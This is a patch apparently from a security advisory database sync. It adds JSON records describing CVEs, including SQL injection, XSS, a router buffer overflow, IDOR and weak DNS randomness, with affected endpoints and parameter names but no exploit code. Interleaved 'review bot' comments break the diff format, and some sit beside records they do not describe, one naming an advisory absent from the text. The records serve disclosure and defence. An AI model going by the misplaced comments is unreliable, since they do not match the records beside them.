diff --git a/advisories/unreviewed/2026/02/GHSA-9rv8-797j-7r85/GHSA-9rv8-797j-7r85.json b/advisories/unreviewed/2026/02/GHSA-9rv8-797j-7r85/GHSA-9rv8-797j-7r85.json
new file mode 100644
index 0000000000000..52086352af573
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-9rv8-797j-7r85/GHSA-9rv8-797j-7r85.json
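Review bot: GHSA-72rq-263w-2jx8 is mapped to `"CWE-94"` (code injection), but `details` describes "improperly controlled modification of object prototype attributes" in the `extend` function, which is the wording of CWE-1321 (prototype pollution). Tooling that triages by CWE will file this under code injection and miss it in prototype-pollution queries. I would add `"CWE-1321"` to `cwe_ids`, keeping `"CWE-94"` only if the upstream record lists it.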
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9rv8-797j-7r85",
+ "modified": "2026-02-23T03:30:22Z",
+ "published": "2026-02-23T03:30:22Z",
+ "aliases": [
+ "CVE-2026-24494"
+ ],
+ "details": "SQL Injection vulnerability in the /api/integrations/getintegrations endpoint of Order Up Online Ordering System 1.0 allows an unauthenticated attacker to access sensitive backend database data via a crafted store_id parameter in a POST request.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24494"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.spartanssec.com/post/multiple-unauthenticated-sql-injection-vulnerabilities"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T02:16:39Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-m5mm-h952-fxjj/GHSA-m5mm-h952-fxjj.json b/advisories/unreviewed/2026/02/GHSA-m5mm-h952-fxjj/GHSA-m5mm-h952-fxjj.json
new file mode 100644
index 0000000000000..68734086b886b
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-m5mm-h952-fxjj/GHSA-m5mm-h952-fxjj.json
@@ -0,0 +1,54 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-m5mm-h952-fxjj",
+ "modified": "2026-02-23T03:30:22Z",
+ "published": "2026-02-23T03:30:22Z",
+ "aliases": [
+ "CVE-2026-2966"
+ ],
+ "details": "A weakness has been identified in Cesanta Mongoose up to 7.20. The impacted element is the function mg_sendnsreq of the file /src/dns.c of the component DNS Transaction ID Handler. Executing a manipulation of the argument random can lead to insufficiently random values. The attack can be launched remotely. The attack requires a high level of complexity. The exploitability is regarded as difficult. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2966"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/dwBruijn/CVEs/blob/main/Mongoose/mg_sendnsreq.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/dwBruijn/CVEs/blob/main/Mongoose/mg_sendnsreq.md#poc"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347333"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347333"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.755304"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T03:15:59Z"
+ }
+}
\ No newline at end of file
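Review bot: `"cwe_ids": []` leaves GHSA-m5mm-h952-fxjj unclassified even though `details` states the outcome as insufficiently random values in the DNS transaction ID handler (`mg_sendnsreq`). That description matches CWE-330, so `"cwe_ids": ["CWE-330"]` would keep the advisory visible to CWE-based filters and dashboards. It is worth checking whether the empty list comes from the import dropping an id it did not recognise rather than from the upstream record having none.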
diff --git a/advisories/unreviewed/2026/02/GHSA-m69x-r9q9-whf9/GHSA-m69x-r9q9-whf9.json b/advisories/unreviewed/2026/02/GHSA-m69x-r9q9-whf9/GHSA-m69x-r9q9-whf9.json
new file mode 100644
index 0000000000000..add8b883a88d8
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-m69x-r9q9-whf9/GHSA-m69x-r9q9-whf9.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-m69x-r9q9-whf9",
+ "modified": "2026-02-23T03:30:22Z",
+ "published": "2026-02-23T03:30:22Z",
+ "aliases": [
+ "CVE-2026-2963"
+ ],
+ "details": "A vulnerability was determined in Jinher OA C6 up to 20260210. This issue affects some unknown processing of the file /C6/Jhsoft.Web.officesupply/OfficeSupplyTypeRight.aspx. This manipulation of the argument id/offsnum causes sql injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. It is suggested to install a patch to address this issue. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2963"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347330"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347330"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.755216"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuln.ricky.place/Jinher/C6"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T01:16:18Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-p2r3-72mr-vwg2/GHSA-p2r3-72mr-vwg2.json b/advisories/unreviewed/2026/02/GHSA-p2r3-72mr-vwg2/GHSA-p2r3-72mr-vwg2.json
new file mode 100644
index 0000000000000..b9cb35160dd87
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-p2r3-72mr-vwg2/GHSA-p2r3-72mr-vwg2.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p2r3-72mr-vwg2",
+ "modified": "2026-02-23T03:30:22Z",
+ "published": "2026-02-23T03:30:22Z",
+ "aliases": [
+ "CVE-2026-2962"
+ ],
+ "details": "A vulnerability was found in D-Link DWR-M960 1.01.07. This vulnerability affects the function sub_460F30 of the file /boafrm/formDateReboot of the component Scheduled Reboot Configuration Endpoint. The manipulation of the argument submit-url results in stack-based buffer overflow. The attack may be performed from remote. The exploit has been made public and could be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2962"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/LX-66-LX/cve-new/issues/29"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347329"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347329"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754517"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dlink.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T01:16:17Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-w6qc-qw25-92c3/GHSA-w6qc-qw25-92c3.json b/advisories/unreviewed/2026/02/GHSA-w6qc-qw25-92c3/GHSA-w6qc-qw25-92c3.json
new file mode 100644
index 0000000000000..0b82b0954867b
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-w6qc-qw25-92c3/GHSA-w6qc-qw25-92c3.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w6qc-qw25-92c3",
+ "modified": "2026-02-23T03:30:22Z",
+ "published": "2026-02-23T03:30:22Z",
+ "aliases": [
+ "CVE-2026-2997"
+ ],
+ "details": "Tronclass developed by WisdomGarden has a Insecure Direct Object Reference vulnerability. After obtaining a course ID, authenticated remote attackers to modify a specific parameter to obtain a course invitation code, thereby joining any course.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2997"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.twcert.org.tw/en/cp-139-10721-276b6-2.html"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.twcert.org.tw/tw/cp-132-10720-ecdfd-1.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-639"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T03:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-xcgv-f626-23hx/GHSA-xcgv-f626-23hx.json b/advisories/unreviewed/2026/02/GHSA-xcgv-f626-23hx/GHSA-xcgv-f626-23hx.json
new file mode 100644
index 0000000000000..348a6e9c4410b
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-xcgv-f626-23hx/GHSA-xcgv-f626-23hx.json
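Review bot: The two vectors in GHSA-w6qc-qw25-92c3 disagree about impact beyond the vulnerable system: the CVSS 3.1 vector has `S:U`, while the 4.0 vector sets `SC:H/SI:H/SA:H`. A consumer that scores from one vector will rank this record differently from one that uses the other, so the pair should be checked against the CNA record before the `MODERATE` label is relied on. Separately, the second sentence of `details` has no verb ("authenticated remote attackers to modify a specific parameter"); something like `authenticated remote attackers can modify a specific parameter` appears to be the intended reading.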
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xcgv-f626-23hx",
+ "modified": "2026-02-23T03:30:22Z",
+ "published": "2026-02-23T03:30:22Z",
+ "aliases": [
+ "CVE-2026-2965"
+ ],
+ "details": "A security flaw has been discovered in 07FLYCMS, 07FLY-CMS and 07FlyCRM up to 1.2.9. The affected element is an unknown function of the file /admin/SysModule/edit.html of the component System Extension Module. Performing a manipulation of the argument Title results in cross site scripting. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. This product is published under multiple names. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2965"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347332"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347332"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.755225"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.notion.so/07FlyCRM-Stored-Cross-Site-Scripting-XSS-in-SysModule-module-303ea92a3c4180d3a9a8e9f6c3d2915a?v=2ffea92a3c418057a8b7000c66564aa1"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T03:15:58Z"
+ }
+}
\ No newline at end of file
From 395d01fc72e66f2ee385dc9b82782b0984b417ea Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com>
Date: Mon, 23 Feb 2026 06:32:07 +0000
Subject: [PATCH 50/77] Advisory Database Sync
---
 .../GHSA-333w-78wm-wpxh.json | 52 ++++++++++++++
 .../GHSA-365g-rr2h-rx65.json | 6 +-
 .../GHSA-3w2g-4qx3-2mmw.json | 6 +-
 .../GHSA-5jgq-pv8m-5cx7.json | 6 +-
 .../GHSA-5qf3-3gp9-pjx6.json | 6 +-
 .../GHSA-6h9v-2cfh-rp3v.json | 52 ++++++++++++++
 .../GHSA-6xrx-3vj8-2rjc.json | 6 +-
 .../GHSA-78xc-39m5-v2c6.json | 6 +-
 .../GHSA-876r-52fj-4pxf.json | 6 +-
 .../GHSA-8j5g-3q2r-xfjh.json | 6 +-
 .../GHSA-9wwr-2jh3-482p.json | 6 +-
 .../GHSA-c6h3-vh8h-r8mj.json | 56 +++++++++++++++
 .../GHSA-f7pj-q7w5-89fg.json | 6 +-
 .../GHSA-g3vh-wfh4-fp76.json | 6 +-
 .../GHSA-h437-rr98-fx56.json | 6 +-
 .../GHSA-hg58-x52p-859c.json | 56 +++++++++++++++
 .../GHSA-hm88-j5r4-fwj3.json | 44 ++++++++++++
 .../GHSA-hx47-q2x9-r28j.json | 72 +++++++++++++++++++
 .../GHSA-j6h2-wr53-6vcg.json | 6 +-
 .../GHSA-j87r-wgfm-7fjj.json | 6 +-
 .../GHSA-jp99-8xc8-367m.json | 6 +-
 .../GHSA-jprc-mg35-68jq.json | 56 +++++++++++++++
 .../GHSA-m34c-wrf8-mw69.json | 6 +-
 .../GHSA-mx4x-pxgm-r77w.json | 6 +-
 .../GHSA-p525-h9pq-233r.json | 6 +-
 .../GHSA-p68h-c56f-p3v6.json | 6 +-
 .../GHSA-q5xx-fxv3-xxqf.json | 56 +++++++++++++++
 .../GHSA-w94g-pmcx-r454.json | 6 +-
 28 files changed, 544 insertions(+), 20 deletions(-)
 create mode 100644 advisories/unreviewed/2026/02/GHSA-333w-78wm-wpxh/GHSA-333w-78wm-wpxh.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-6h9v-2cfh-rp3v/GHSA-6h9v-2cfh-rp3v.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-c6h3-vh8h-r8mj/GHSA-c6h3-vh8h-r8mj.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-hg58-x52p-859c/GHSA-hg58-x52p-859c.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-hm88-j5r4-fwj3/GHSA-hm88-j5r4-fwj3.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-hx47-q2x9-r28j/GHSA-hx47-q2x9-r28j.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-jprc-mg35-68jq/GHSA-jprc-mg35-68jq.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-q5xx-fxv3-xxqf/GHSA-q5xx-fxv3-xxqf.json
diff --git a/advisories/unreviewed/2026/02/GHSA-333w-78wm-wpxh/GHSA-333w-78wm-wpxh.json b/advisories/unreviewed/2026/02/GHSA-333w-78wm-wpxh/GHSA-333w-78wm-wpxh.json
new file mode 100644
index 0000000000000..c9e7c7468342c
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-333w-78wm-wpxh/GHSA-333w-78wm-wpxh.json
@@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-333w-78wm-wpxh", + "modified": "2026-02-23T06:30:18Z", + "published": "2026-02-23T06:30:18Z", + "aliases": [ + "CVE-2026-2971" + ], + "details": "A vulnerability was found in a466350665 Smart-SSO up to 2.1.1. Affected by this issue is some unknown functionality of the file smart-sso-server/src/main/resources/templates/login.html of the component Login. Performing a manipulation of the argument redirectUri results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2971" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347338" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347338" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756025" + }, + { + "type": "WEB", + "url": "https://www.notion.so/Smart-SSO-Reflected-XSS-vulnerabilities-in-redirectUri-parameter-304ea92a3c41805a8223c4ba75831802" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T05:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json b/advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json index 414c99dc1227c..5d446af118b92 100644 
--- a/advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json +++ b/advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-365g-rr2h-rx65", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-23T06:30:17Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-71234" @@ -22,6 +22,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/5d810ba377eddee95d30766d360a14efbb3d1872" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/86c946bcc00f6390ef65e9614ae60a9377e454f8" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/9a0f3fa6ecd0c9c32dbc367a57482bbf7c7d25bf" diff --git a/advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json b/advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json index 28af8376248f3..06ca1e072c09a 100644 --- a/advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json +++ b/advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3w2g-4qx3-2mmw", - "modified": "2026-02-19T18:31:43Z", + "modified": "2026-02-23T06:30:17Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-71232" @@ -22,6 +22,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/19ac050ef09a2f0a9d9787540f77bb45cf9033e8" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7adbd2b7809066c75f0433e5e2a8e114b429f30f" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/8e7597b4efee6143439641bc6522f247d585e060" diff --git a/advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json b/advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json index 95597dbc48090..411ccb818c324 100644 --- a/advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json +++ b/advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5jgq-pv8m-5cx7", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23226" @@ -18,6 +18,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/36ef605c0395b94b826a8c8d6f2697071173de6e" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4f3a06cc57976cafa8c6f716646be6c79a99e485" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/e4a8a96a93d08570e0405cfd989a8a07e5b6ff33" diff --git a/advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json b/advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json index 34d0010905ba6..4e0bdcc852df2 100644 --- a/advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json +++ b/advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5qf3-3gp9-pjx6", - "modified": "2026-02-19T18:31:44Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23222" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23222" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1562b1fb7e17c1b3addb15e125c718b2be7f5512" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/2ed27b5a1174351148c3adbfc0cd86d54072ba2e" diff --git a/advisories/unreviewed/2026/02/GHSA-6h9v-2cfh-rp3v/GHSA-6h9v-2cfh-rp3v.json b/advisories/unreviewed/2026/02/GHSA-6h9v-2cfh-rp3v/GHSA-6h9v-2cfh-rp3v.json new file mode 100644 index 0000000000000..735474aa5b8c7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6h9v-2cfh-rp3v/GHSA-6h9v-2cfh-rp3v.json 
@@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6h9v-2cfh-rp3v", + "modified": "2026-02-23T06:30:19Z", + "published": "2026-02-23T06:30:18Z", + "aliases": [ + "CVE-2026-2972" + ], + "details": "A vulnerability was determined in a466350665 Smart-SSO up to 2.1.1. This affects the function Save of the file smart-sso-server/src/main/java/openjoe/smart/sso/server/controller/admin/UserController.java of the component Role Edit Page. Executing a manipulation can lead to cross site scripting. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2972" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347339" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347339" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756026" + }, + { + "type": "WEB", + "url": "https://www.notion.so/Smart-SSO-Stored-Cross-Site-Scripting-XSS-in-Role-Edit-Page-303ea92a3c4180f4beb9c119653ce51d" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T06:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json b/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json index d3013aa26201c..8c79829dd4f00 100644 
--- a/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json +++ b/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6xrx-3vj8-2rjc", - "modified": "2026-02-18T18:30:39Z", + "modified": "2026-02-23T06:30:17Z", "published": "2026-02-18T18:30:39Z", "aliases": [ "CVE-2025-71230" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71230" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/05ce49a902be15dc93854cbfc20161205a9ee446" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/399219831514126bc9541e8eadefe02c6fbd9166" diff --git a/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json b/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json index 27a6aca498c97..fc677b090f509 100644 --- a/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json +++ b/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-78xc-39m5-v2c6", - "modified": "2026-02-19T18:31:43Z", + "modified": "2026-02-23T06:30:17Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-71233" @@ -26,6 +26,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/73cee890adafa2c219bb865356e08e7f82423fe5" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7c5c7d06bd1f86d2c3ebe62be903a4ba42db4d2c" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/8cb905eca73944089a0db01443c7628a9e87012d" diff --git a/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json b/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json index 448fe32ded5ec..7a4bd28abf2c5 100644 --- a/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json +++ b/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json 
